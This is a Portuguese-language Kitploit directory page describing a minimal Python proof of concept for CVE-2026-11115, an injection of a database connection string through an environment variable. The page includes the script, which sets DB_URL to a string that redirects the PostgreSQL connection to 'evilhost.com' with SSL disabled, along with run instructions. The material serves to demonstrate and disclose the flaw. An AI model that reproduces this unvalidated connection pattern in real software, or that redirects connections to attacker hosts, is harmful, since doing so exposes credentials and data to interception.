Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable — Prova de conceito mínima em Python para o CVE-2026-11115, demonstrando injeção de string de conexão de banco de dados via variáveis de ambiente e redirecionamento para hosts PostgreSQL controlados por atacantes. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoConfiguração IncorretaAprendizado e EducaçãoSegurança de Banco de Dados
GitHubgeorge0papasotiriou/cve-2026-11115-database-connection-string-injection-via-env-variable

CVE-2026-11115-Database-Connection-String-Injection-via-Env-Variable

Prova de conceito mínima em Python para o CVE-2026-11115, demonstrando injeção de string de conexão de banco de dados via variáveis de ambiente e redirecionamento para hosts PostgreSQL controlados por atacantes.

Ver Repositório
19há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-11115 – Injeção de String de Conexão de Banco de Dados via Variável de Ambiente

Código do Programa (Python)

# db_connector.py - Constructs DB connection string from environment
import os, psycopg2

def connect():
    # Reads DB_URL; attacker can override via environment injection if they control an env var
    db_url = os.getenv('DB_URL', 'postgresql://user:pass@localhost/db')
    # Vulnerability: no validation; allows extra parameters like ?application_name=... but also SSRF or auth bypass
    conn = psycopg2.connect(db_url)
    return conn

# Simulate an attacker who can set environment variable:
os.environ['DB_URL'] = "postgresql://user:pass@localhost/db?host=evilhost.com&sslmode=disable"
c = connect()  # Connects to attacker-controlled host!
print("Connected to attacker DB.")

CVE-2026-11115 – Injeção de String de Conexão de Banco de Dados

Severity: High

Visão Geral

Um aplicativo constrói sua string de conexão com o banco de dados a partir de uma variável de ambiente sem validação. Se um atacante puder influenciar essa variável (por exemplo, via server-side request forgery ou configuração incorreta de pipeline de CI/CD), ele poderá redirecionar a conexão do banco de dados para o próprio servidor, interceptando ou modificando dados.

Detalhes da Vulnerabilidade

  • Tipo: Injeção de String de Conexão
  • Impacto: Exfiltração de dados, man-in-the-middle.
  • Causa raiz: A URI completa de conexão é obtida de uma variável de ambiente, e parâmetros adicionais (como host) podem ser anexados para sobrescrever o host original.

Demonstração do Exploit

Execute a simulação:

pip install psycopg2-binary
python db_connector.py

O programa tenta se conectar a evilhost.com em vez de localhost.

Baixar ferramenta